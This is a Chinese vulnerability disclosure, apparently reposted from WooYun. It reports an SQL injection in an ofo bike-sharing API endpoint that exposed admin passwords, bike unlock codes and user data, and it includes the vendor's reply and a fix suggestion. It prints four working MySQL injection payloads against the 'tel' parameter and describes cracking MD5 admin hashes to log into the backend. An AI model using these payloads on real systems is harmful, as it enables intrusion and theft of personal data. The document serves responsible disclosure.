ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-24: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

某处 api 没有对 SQL 注入过滤,导致后台密码,车辆密码,用户隐私泄露。

详细说明:

主站 www.ofo.so/Api/getPacket 红包页面没有对 SQL 注入过滤。



P1.jpg





可以直接注入。



code 区域
---
Parameter: tel (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: tel=12343211234") AND 7541=7541#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tel=12343211234") AND (SELECT 4714 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(4714=4714,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("SFUv"="SFUv&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: tel=12343211234");(SELECT * FROM (SELECT(SLEEP(5)))xnKx)#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: tel=12343211234") AND (SELECT * FROM (SELECT(SLEEP(5)))UCSC) AND ("RqRC"="RqRC&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
---





[INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.29, PHP 5.4.27

back-end DBMS: MySQL 5.0



另外警告一下 san.ofo.so 也有注入漏洞,懒得深入了,麻烦自查。

漏洞证明:

--tables

tables.png





所有后台用户密码为单次 md5,随意破。



user1.jpg





后台地址全都在 sp_auth_rule 里。没有授权可以随意访问。

随便登录一个试试



login.png





懒得脱库了,要跑太久,随便拖几个看看,好像 CEO 的学号和手机也漏了



user.png





车密码



carno.png





看这数据库一溜 null 看来代码管理真是混乱。。心疼小黄车

修复方案:

www.ofo.so 和 san.ofo.so 麻烦都上个 WAF 谢谢,很容易上马拿到认证用的学生证照片的。网站后台用thinkcmf请及时升级。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-25 17:00

厂商回复:

非常感谢作者,不过这个版本的接口我们已经淘汰掉了。您查看的这个版本是php的,并且表名和表结构都已经变了。不知道能否知晓一下你查看这个版本的时间。因为有段时间php和java版两个同时存在,是为了过渡一下旧版的app保留。现在php版已经无法使用了。真的非常感谢您。

最新状态:

2016-04-25:已确定是旧版系统的,并且旧版系统已经关闭。感谢作者!


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私 - https://www.15qq.cn/wooyun/996.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知